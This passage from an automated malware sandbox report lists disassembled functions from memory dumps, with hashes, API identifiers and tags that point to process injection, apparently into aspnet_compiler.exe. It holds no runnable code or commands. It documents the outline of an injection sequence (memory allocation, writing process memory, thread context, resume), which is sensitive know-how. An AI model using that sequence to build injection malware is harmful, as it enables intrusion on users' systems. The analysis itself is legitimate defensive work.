                                                      • API String ID: 1082081703-0
                                                      • Opcode ID: 05add24218a774af5245e6fe1d3b02636f93840bc5bc5ff01134a164c704a216
                                                      • Instruction ID: c4b1bb077322b1c1883f91d4dd838761a1a829b9e71be4259e838058b57c15a7
                                                      • Opcode Fuzzy Hash: 05add24218a774af5245e6fe1d3b02636f93840bc5bc5ff01134a164c704a216
                                                      • Instruction Fuzzy Hash: 7141173190CB8C8FDB199B6898066F9BBE0EF56721F04436FD049C3292DF746846C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884880D, Relevance: 1.6, APIs: 1, Instructions: 137memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 691d4d0646bb00abf8ab2ff5354b86fa34e53f8dbc21ce049a85f10b86d3edcd
                                                      • Instruction ID: 7ff1c5c975984241da8344bbf5110305dc49c1f2e6a76894a9af1f4865f244e9
                                                      • Opcode Fuzzy Hash: 691d4d0646bb00abf8ab2ff5354b86fa34e53f8dbc21ce049a85f10b86d3edcd
                                                      • Instruction Fuzzy Hash: 6741273190CB8C8FDB19DB689845AB97FF0EF56321F0443AFD049C3592CB646846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884B2D0, Relevance: 1.6, APIs: 1, Instructions: 136injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: a81d03ddc163489eb6c304c5afec1da861b256246de54c3006cb7770162d0375
                                                      • Instruction ID: b9b84cfd77e4ebc73b193f21d73a749f65e3ff045c7ea2c2b286a79f080067cf
                                                      • Opcode Fuzzy Hash: a81d03ddc163489eb6c304c5afec1da861b256246de54c3006cb7770162d0375
                                                      • Instruction Fuzzy Hash: 1441C33190CA5C8FDB189B9998066E9BBE0EB55320F04426FE04DD3292DF64A846CBD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08840A90, Relevance: 1.6, APIs: 1, Instructions: 131memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 601217df6b688684886ba299c6d55033ca4064542ac01b950b5374b10b782485
                                                      • Instruction ID: 4e34e5a9d5fe0575e52731fef0bfd4a93c49ec6536f1ff3104c32f20937c0ef1
                                                      • Opcode Fuzzy Hash: 601217df6b688684886ba299c6d55033ca4064542ac01b950b5374b10b782485
                                                      • Instruction Fuzzy Hash: CC41157190CA9C8FDB18DBA898497B9BBF0EB55315F04827FD049C3193CB64A846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884B1C8, Relevance: 1.6, APIs: 1, Instructions: 130memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: c287ee7cfdcb4ab3a8a066291fe58ac1c5884fea54bb5ec091a3a53ea9441b01
                                                      • Instruction ID: 7a80302c84afe4ec5c777cda884257b0a57cff6d5edac78a1421ec3b6b3f1e56
                                                      • Opcode Fuzzy Hash: c287ee7cfdcb4ab3a8a066291fe58ac1c5884fea54bb5ec091a3a53ea9441b01
                                                      • Instruction Fuzzy Hash: A531F83190CB4C4FDB199B689806AF97BE0EF55320F00426FE04DC3292DE74A856CBD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08840AA0, Relevance: 1.6, APIs: 1, Instructions: 127memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 4ee4f1de2ba5384a183569ce58e70f738cf6dbc6a6cda91d6951c046d116e806
                                                      • Instruction ID: 0c5e0fb108d556788fccde5599327fc0e52f934f9d6a33bc0615e246a5d26c67
                                                      • Opcode Fuzzy Hash: 4ee4f1de2ba5384a183569ce58e70f738cf6dbc6a6cda91d6951c046d116e806
                                                      • Instruction Fuzzy Hash: A731287190CB9C8FDB18DB9898456B9BBF0FB55311F04427FD049C3192CB70A846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884D228, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: EnumProcesses
                                                      • String ID:
                                                      • API String ID: 84517404-0
                                                      • Opcode ID: 79db53ada5da5b6ec54847006b2f532ed0958bec8c22298b907d370a1e42eec4
                                                      • Instruction ID: bfe5385c66aa72695891fb29a079d93c5d9ef83d277cb8d8af2cc801d0057a61
                                                      • Opcode Fuzzy Hash: 79db53ada5da5b6ec54847006b2f532ed0958bec8c22298b907d370a1e42eec4
                                                      • Instruction Fuzzy Hash: 0431803190CB6C8FDB28DF9D98556F97BE0EB65321F00416FE04AD3691CA74A845CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884DA76, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 3526f3169792b84ced0e02664ad79e4b31b059d0ecb0d3589a134bb4362dab57
                                                      • Instruction ID: f35f16aa9c1ae40bcb8c8f862f3604b7b77fad608a67ef9e5fc97ff389958ab4
                                                      • Opcode Fuzzy Hash: 3526f3169792b84ced0e02664ad79e4b31b059d0ecb0d3589a134bb4362dab57
                                                      • Instruction Fuzzy Hash: 01312A3190CB8D8FDB19DB689806BE97BF0EF56320F0442AFD049C35D2DA696856CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08840AB0, Relevance: 1.6, APIs: 1, Instructions: 121memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 7618121781ec8b363a2195ffdde4fecf6bcfb06317ff4206e4ef7461a806820d
                                                      • Instruction ID: f1beb01b11207e3b00b6619defd1ee824997805430dbfb25f82487f850e35fc0
                                                      • Opcode Fuzzy Hash: 7618121781ec8b363a2195ffdde4fecf6bcfb06317ff4206e4ef7461a806820d
                                                      • Instruction Fuzzy Hash: 4331053090CA5C8FDB18DF9C98456B9BBF0EB95311F04427FD04AD3692CB70A846C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884B0E0, Relevance: 1.6, APIs: 1, Instructions: 112threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: bcf41045d11c40dcb1f61ebd15f7d5641645749bceccbecb7ecd3a881ed6613a
                                                      • Instruction ID: e9a1612968bf544c51f800a38c082f77bc659abe5b529528f743f87267ec1864
                                                      • Opcode Fuzzy Hash: bcf41045d11c40dcb1f61ebd15f7d5641645749bceccbecb7ecd3a881ed6613a
                                                      • Instruction Fuzzy Hash: C531FB3190CB5C8FDB28DBA998066F97BE0EF55321F00427FD04ED3692DE64A446C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884AEE5, Relevance: 1.6, APIs: 1, Instructions: 102threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: fe025faa75f6e224f9f7e865ee3e0aa25be360c33205c72bf8bc1e0a1cfae491
                                                      • Instruction ID: 2fa4d22ed59c7c0051561358d88c9dbdd580ceea1b1a5e5cff996a054fa932b4
                                                      • Opcode Fuzzy Hash: fe025faa75f6e224f9f7e865ee3e0aa25be360c33205c72bf8bc1e0a1cfae491
                                                      • Instruction Fuzzy Hash: 0831033190C65C8FDF59DF6898556F97BE0EF56320F04816FD04DC7292DA78580ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: aspnet_compiler.exe PID: 5900 Parent PID: 6604 aspnet_compiler.exeCOMMON

                                                      Executed Functions

                                                      Function 00007FFC08820FB0, Relevance: 5.6, Strings: 4, Instructions: 567COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: {J$({J$)a_H$0{J
                                                      • API String ID: 0-1350880171
                                                      • Opcode ID: 5a284c17f1e8dded92252c8fb47c7c20d9b58d43cdf4af984d182ebadf3172db
                                                      • Instruction ID: 9671aa49a7eca0b8b6868c04ccd985289d2d84a6fd1dcfae82776931b9a222e2
                                                      • Opcode Fuzzy Hash: 5a284c17f1e8dded92252c8fb47c7c20d9b58d43cdf4af984d182ebadf3172db
                                                      • Instruction Fuzzy Hash: 9A12232580D6998FEB41E77898696E97FA0EF43330F1405FAD089CB1E3DA18684EC765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820F83, Relevance: 5.6, Strings: 4, Instructions: 563COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: {J$({J$)a_H$0{J
                                                      • API String ID: 0-1350880171
                                                      • Opcode ID: 21bda57fa40641d5990b56fa9e4eaf05329faf08e62eb4c10bb196a0f5988e71
                                                      • Instruction ID: 8b329d2e014a890b821b85b2ac59d4239e0f2bed707c702709d908c2f68bdfa5
                                                      • Opcode Fuzzy Hash: 21bda57fa40641d5990b56fa9e4eaf05329faf08e62eb4c10bb196a0f5988e71
                                                      • Instruction Fuzzy Hash: 1312286580D2998FEB41E77894696E97FA0EF03330F1404FAD089CB1E3DA1D694EC765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08821183, Relevance: 5.4, Strings: 4, Instructions: 361COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: {J$({J$)a_H$0{J
                                                      • API String ID: 0-1350880171
                                                      • Opcode ID: f4c5a1f0b93ba3b1a2f10d5ee081b64a15819c4a79fc8d2d2f928fe94e72983b
                                                      • Instruction ID: d06ef33c6e9fa71f58029b6a39b17f4dd1efc7a0b4baf9126fcf7cd4a261211f
                                                      • Opcode Fuzzy Hash: f4c5a1f0b93ba3b1a2f10d5ee081b64a15819c4a79fc8d2d2f928fe94e72983b
                                                      • Instruction Fuzzy Hash: 2BD1C27440D68A8FDB82DB78C8697A87FE1FF46320F2405FAC049CB1D7DA68684AC755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820DE0, Relevance: 5.2, Strings: 4, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H{J$H{J$H{J$P{J
                                                      • API String ID: 0-123341277
                                                      • Opcode ID: 134c7e08a1c6e5684a173599ba2c7fb3b2489d309dffaf0fef082abaaa7d0b10
                                                      • Instruction ID: 0df19087024578f1d36d42efcff4397f4be1e384d22c8760db7b78a42f460774
                                                      • Opcode Fuzzy Hash: 134c7e08a1c6e5684a173599ba2c7fb3b2489d309dffaf0fef082abaaa7d0b10
                                                      • Instruction Fuzzy Hash: D0516B3190D6AE5FE751A628D455AF97BA1EF82320F0446F6C149DB1D3DA1C2C4FC368
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820739, Relevance: 3.9, Strings: 3, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: XZJ$XZJ$XZJ
                                                      • API String ID: 0-581742771
                                                      • Opcode ID: 2c6c5498638d659e8ddc928d62319185019a7e7b927fe0c437db76094e9e95c4
                                                      • Instruction ID: 5625dd409de41791db25bb172c69f5f7e24225b8a63287aa31c4778d24491c0a
                                                      • Opcode Fuzzy Hash: 2c6c5498638d659e8ddc928d62319185019a7e7b927fe0c437db76094e9e95c4
                                                      • Instruction Fuzzy Hash: 1E41F72160EADE4FD792E77C98299B87BE0EF5A22031501FAC489CB1E7D91C5C4BC725
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088208D8, Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: zJ$zJ$zJ
                                                      • API String ID: 0-2323990880
                                                      • Opcode ID: 70a82ad2cace434427c524bc25fcf97acdebe8130d1a73833af9636f25b1ce15
                                                      • Instruction ID: 1590d16fb87cff26c6d1118ecfa8df14146106cf76ccbd126975c222a16b1799
                                                      • Opcode Fuzzy Hash: 70a82ad2cace434427c524bc25fcf97acdebe8130d1a73833af9636f25b1ce15
                                                      • Instruction Fuzzy Hash: 55F0442B91C1B5CDD701B66A70A55E97F109F42379B2404BBE2C40D1A3DA1695CAC6D4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820DA2, Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H{J$H{J
                                                      • API String ID: 0-2799930348
                                                      • Opcode ID: 0aa7ac47c28f72d4620bb2d982c4e1b1a040d16b45a41262f6955b5885c0f33e
                                                      • Instruction ID: 8e7ad2b89b67a4a15ae798e1023f965d1cacd5e87c03b1d6f6d211291e436003
                                                      • Opcode Fuzzy Hash: 0aa7ac47c28f72d4620bb2d982c4e1b1a040d16b45a41262f6955b5885c0f33e
                                                      • Instruction Fuzzy Hash: E031041290D5BA5FEA51B23864A69F53B90DF43330B1406B3D28CCA1D3DD0D688FC278
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820E18, Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H{J$H{J
                                                      • API String ID: 0-2799930348
                                                      • Opcode ID: 7a34f9c56f51712783e701ecd1c99e5c9b1ff1711114de83eba06cf99eac44d9
                                                      • Instruction ID: 2234b10f725f924ef067311455a99bf893527bb96c643226d8d5cb0cbbc5d925
                                                      • Opcode Fuzzy Hash: 7a34f9c56f51712783e701ecd1c99e5c9b1ff1711114de83eba06cf99eac44d9
                                                      • Instruction Fuzzy Hash: 1E112920A0D6BE1FD791A6785955AF53BD1EF82330B0046F6C599CB0D7D90C2C9BC369
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08829BD0, Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `6J$h6J
                                                      • API String ID: 0-1184709796
                                                      • Opcode ID: 8241a54c38455a427bbbf62dad92354d397b19d0642f15d071760118cf3c1ff0
                                                      • Instruction ID: c83d4a70e9e77354c582e1ac129f454d6e70bcc749b705713a1356d338f026e2
                                                      • Opcode Fuzzy Hash: 8241a54c38455a427bbbf62dad92354d397b19d0642f15d071760118cf3c1ff0
                                                      • Instruction Fuzzy Hash: F0F0593064EA4E5FDB86EB388C255E13BD0EF86320B4001FDD40ECB292E91C4889C715
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820930, Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: zJ
                                                      • API String ID: 0-2074459920
                                                      • Opcode ID: 311f0e0a40a474cc3ef7775f4a84c703952334b91e64aba3866f12c521e775c4
                                                      • Instruction ID: 5af4abf7b6a58789d82d1effee69a275ffba1bdcc0122513baeef0b02a272e7e
                                                      • Opcode Fuzzy Hash: 311f0e0a40a474cc3ef7775f4a84c703952334b91e64aba3866f12c521e775c4
                                                      • Instruction Fuzzy Hash: 1B312C7450E68A5FD782A7B4442AAE97FE0EF4632071509FDD48ACB1A3DC1C8C07D314
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882157A, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8{J
                                                      • API String ID: 0-1351968133
                                                      • Opcode ID: 67a94e0a9bf3699b23aef978472894858a8a1b89465ac6b3c651499fe00abb4c
                                                      • Instruction ID: 74cff8afb9f71643e322d931401b260aaf5bcb1c4c46a8f30e1b03927c62f799
                                                      • Opcode Fuzzy Hash: 67a94e0a9bf3699b23aef978472894858a8a1b89465ac6b3c651499fe00abb4c
                                                      • Instruction Fuzzy Hash: 1E01DF6584E2D64FD35A9BB458294A17FE2DF4722070942FED186CB0B3D95D0C8BC7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088215A0, Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8{J
                                                      • API String ID: 0-1351968133
                                                      • Opcode ID: 9aa13d358f43451fc3140ea6402d5d9f8093b12dfbfc6a8f5691df859b2d6f59
                                                      • Instruction ID: 0ad43e6fdcad95bcc934642f76581431a191c77baeb3bf83258bc2deb69ebcc6
                                                      • Opcode Fuzzy Hash: 9aa13d358f43451fc3140ea6402d5d9f8093b12dfbfc6a8f5691df859b2d6f59
                                                      • Instruction Fuzzy Hash: 8FE06871D0D15A8FD76CAA7828260B476A1EF06220B0146FDD04BCB2EADD1C0C86CBE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882050D, Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53f97ff3acc6f66181f653146c0c2c7951f421b89e33e04320467fd06154f5b6
                                                      • Instruction ID: 46c19f768e257835947c454a6bf25edb716652a3e51c53e38565d264ff5cac60
                                                      • Opcode Fuzzy Hash: 53f97ff3acc6f66181f653146c0c2c7951f421b89e33e04320467fd06154f5b6
                                                      • Instruction Fuzzy Hash: 31318E31E18D6D8FEB94EB2CA4156BCB7E1EF88310B4402B6D10DD72D6DE286C468795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C2D, Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6dd64be3aa39ca97617c2647ae9c98317623d9966edac1a786690359bdaee4bf
                                                      • Instruction ID: acb54021136447444bc12560a32927543402694a4d728d84331ab200f0dfdeac
                                                      • Opcode Fuzzy Hash: 6dd64be3aa39ca97617c2647ae9c98317623d9966edac1a786690359bdaee4bf
                                                      • Instruction Fuzzy Hash: 13212736D0D65DDFD751DB68C8415E8BBE0EF42320F2446B6C185D71C3D928254EC764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088207D9, Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c8d16911f6797e3cadc5cf4c2b4c08678bd9f3a572a985ae4ffe8a0d5197a355
                                                      • Instruction ID: 65580b17b1380b8abb0fea465ff0b72d5b2fa46c68d2ac4860f3c1eb5d74b1f6
                                                      • Opcode Fuzzy Hash: c8d16911f6797e3cadc5cf4c2b4c08678bd9f3a572a985ae4ffe8a0d5197a355
                                                      • Instruction Fuzzy Hash: 6B11593150E98D4FD791E738881E9A57BE1EF4B22031902FAC88DCB2A3D92C5C47C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C38, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3105eb5935048d7605e4074ea22f180a81ef2624902d562e9922e25ca943dec
                                                      • Instruction ID: e7274bbc6c73d8fed1ea7b68039d884af9380d530e741288697bdb4190e5805f
                                                      • Opcode Fuzzy Hash: c3105eb5935048d7605e4074ea22f180a81ef2624902d562e9922e25ca943dec
                                                      • Instruction Fuzzy Hash: 2111C236D0865DCAE711EB68C8446DCBBE0FF42334F2486BAC580E7282DA74664EC790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882044D, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8cc6c6abae3881243a7e49498ca87337ccfd9b7b6da81d7e7a46de1ebcb8a13
                                                      • Instruction ID: ff8fe881a3c29d81f8b2f1d2ac7ab61d467541a73e35c8ee8d508cb52b246d11
                                                      • Opcode Fuzzy Hash: e8cc6c6abae3881243a7e49498ca87337ccfd9b7b6da81d7e7a46de1ebcb8a13
                                                      • Instruction Fuzzy Hash: 3B01D802D4CDFA0FFA5AA26814216796A90EF56224F4582B6C289C71D3EC48184BC3B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C40, Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16587d4ee1e3378cb09ccfaf0a8ed51c1661c4bf8f2856888b0155620d8821e7
                                                      • Instruction ID: e31f61e4f3e8f015c93302c4b16875acc7f35f21dbf85881d741a9d27c2f9b1b
                                                      • Opcode Fuzzy Hash: 16587d4ee1e3378cb09ccfaf0a8ed51c1661c4bf8f2856888b0155620d8821e7
                                                      • Instruction Fuzzy Hash: C901C876D0865DCBE711DB68C8455DCBBF0FF41320F2486BAC584E7282D534664EC790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C48, Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9215855c37d9b9a98cfff322fa594a8e053bb896e20f213eec66eb27272ba26
                                                      • Instruction ID: bc95e26fe39aadbb07f179b147e01d8e0c479cb59c680b5338210d860b90b569
                                                      • Opcode Fuzzy Hash: f9215855c37d9b9a98cfff322fa594a8e053bb896e20f213eec66eb27272ba26
                                                      • Instruction Fuzzy Hash: 4F01B576D0865DCBEB11DB68C4445ECBBF0FF41320F2486BAC544E7282DA34664EC790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820460, Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d440fd0e929d37342b7075cae18c652a5688a876dd41ef4c8069eeda722aea6d
                                                      • Instruction ID: 4c3077971b15b01366b5c3c43c35fc8754503509a47cd14e9115a1bccb8cce63
                                                      • Opcode Fuzzy Hash: d440fd0e929d37342b7075cae18c652a5688a876dd41ef4c8069eeda722aea6d
                                                      • Instruction Fuzzy Hash: 42F0680294CDFA4FF65A626814626B56FA0EB5B110F0992B6C599C71D3DC481C4A83BA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820C50, Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b05a775ce000aa15c630110ff8bd9a0b1f689b11985477d88629c008b9b782ad
                                                      • Instruction ID: eaba8302b7e3637badf8134a3f624064dc8d49245e05219672f51a32d6a4651d
                                                      • Opcode Fuzzy Hash: b05a775ce000aa15c630110ff8bd9a0b1f689b11985477d88629c008b9b782ad
                                                      • Instruction Fuzzy Hash: 85018475D0C65DDBEB50DB68C8445ECBBE0FF41310F1486B5D544E7286DA34664DC750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088206E9, Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.509850833.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ec937a85a827532fdc426387149136216884011c82a8e14f81af89cb31d6a7f
